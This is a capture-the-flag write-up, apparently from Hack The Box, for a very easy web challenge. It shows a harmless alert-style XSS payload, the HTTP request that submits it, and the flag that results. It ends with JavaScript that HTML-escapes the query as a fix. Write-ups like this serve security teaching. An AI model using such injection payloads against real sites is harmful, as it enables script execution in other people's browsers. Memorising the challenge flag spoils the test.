Phantom Script
Challenge Description
Every Halloween, an enigmatic blog emerges from the depths of the dark web—Phantom’s Script. Its pages are filled with cursed writings and hexed code that ensnare the souls of unwary visitors. The blog’s malicious scripts weave dark secrets into the fabric of the internet, spreading corruption with each click. Rumor has it that interacting with the site in unexpected ways can trigger hidden incantations. Will you dare to delve into this haunted scroll, manipulate the scripts, and purge the malevolent code before it claims more victims?
Category: Web
Difficulty: Very Easy
Solution
This challenge is fairly easy: we only need to get an XSS to execute on the page. The same payload that already appears in the application can be used to obtain the flag.
<img src=x onerror="alert('Boo!')">
Once we submit the payload, we wait a moment and the flag appears.
POST /search HTTP/1.1
Host: 94.237.54.190:32578
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://94.237.54.190:32578/
Content-Type: application/json
Content-Length: 49
Origin: http://94.237.54.190:32578
Connection: keep-alive
Priority: u=0

{"query":"<img src=x onerror=\"alert('Boo!')\">"}
Spooky Surprise
HTB{xS5_iS_34SY_wh4t_d0_you_th1nk?}
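The fix for this class of bug, as an added example that is not the challenge's own code: the search term from the request above is HTML-encoded before it is placed in the results markup. The function names and the "No results for" template are assumptions, since the write-up does not show how the application renders the query.

```javascript
// Constructed sample: the "query" value from the POST /search body above.
const SAMPLE_QUERY = `<img src=x onerror="alert('Boo!')">`;

// Characters that can open a tag, close an attribute or start an entity.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode a value for use as HTML text content or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Assumed vulnerable pattern: the query is concatenated into markup as-is,
// so the browser parses the <img> element and fires its onerror handler.
function renderUnsafe(query) {
  return `<p>No results for: ${query}</p>`;
}

// Hardened form: same template, but the query is encoded first, so the
// browser shows the payload as literal text.
function renderSafe(query) {
  return `<p>No results for: ${escapeHtml(query)}</p>`;
}

// Check used below: does anything inside the <p> wrapper still look like
// the start of a tag, closing tag or comment?
function containsInjectedTag(html) {
  const inner = html.replace(/^<p>/, '').replace(/<\/p>$/, '');
  return /<[a-zA-Z!\/]/.test(inner);
}

console.log('unsafe:', renderUnsafe(SAMPLE_QUERY));
console.log('safe:  ', renderSafe(SAMPLE_QUERY));
```

When the results are built in the browser instead, assigning the query through textContent rather than innerHTML gives the same result without manual encoding.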